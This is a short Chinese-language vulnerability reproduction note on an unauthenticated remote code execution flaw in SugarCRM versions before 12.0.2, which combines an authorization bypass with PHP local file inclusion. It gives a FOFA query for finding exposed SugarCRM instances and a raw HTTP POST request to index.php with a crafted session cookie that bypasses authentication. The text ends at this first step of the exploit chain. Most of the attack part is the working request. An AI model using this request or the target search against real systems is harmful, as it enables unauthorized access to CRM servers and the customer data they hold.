0x01 產品簡介

  SugarCRM是美國SugarCRM公司的一套開源的客戶關系管理系統（CRM）。該系統支持對不同的客戶需求進行差異化營銷、管理和分配銷售線索，實現銷售代表的信息共享和追蹤。

0x02 漏洞概述

 SugarCRM index.php接口存在安全漏洞，該漏洞源于安裝組件中存在授權繞過和PHP本地文件包含漏洞，允許通過HTTP請求對已配置的SugarCRM實例執行未經身份驗證的遠程代碼。

0x03 影響范圍

SugarCRM 12.0.2 之前版本

0x04 復現環境

FOFA：app="sugarcrm"

0x05 漏洞復現 

攜帶特制cookie繞過授權

POST /index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=7665b859-ea78-4240-b2c2-63c890a422cd
Accept-Encoding: gzip
Connection: closemodule=Users&action=Authenticate&user_name=1&user_password=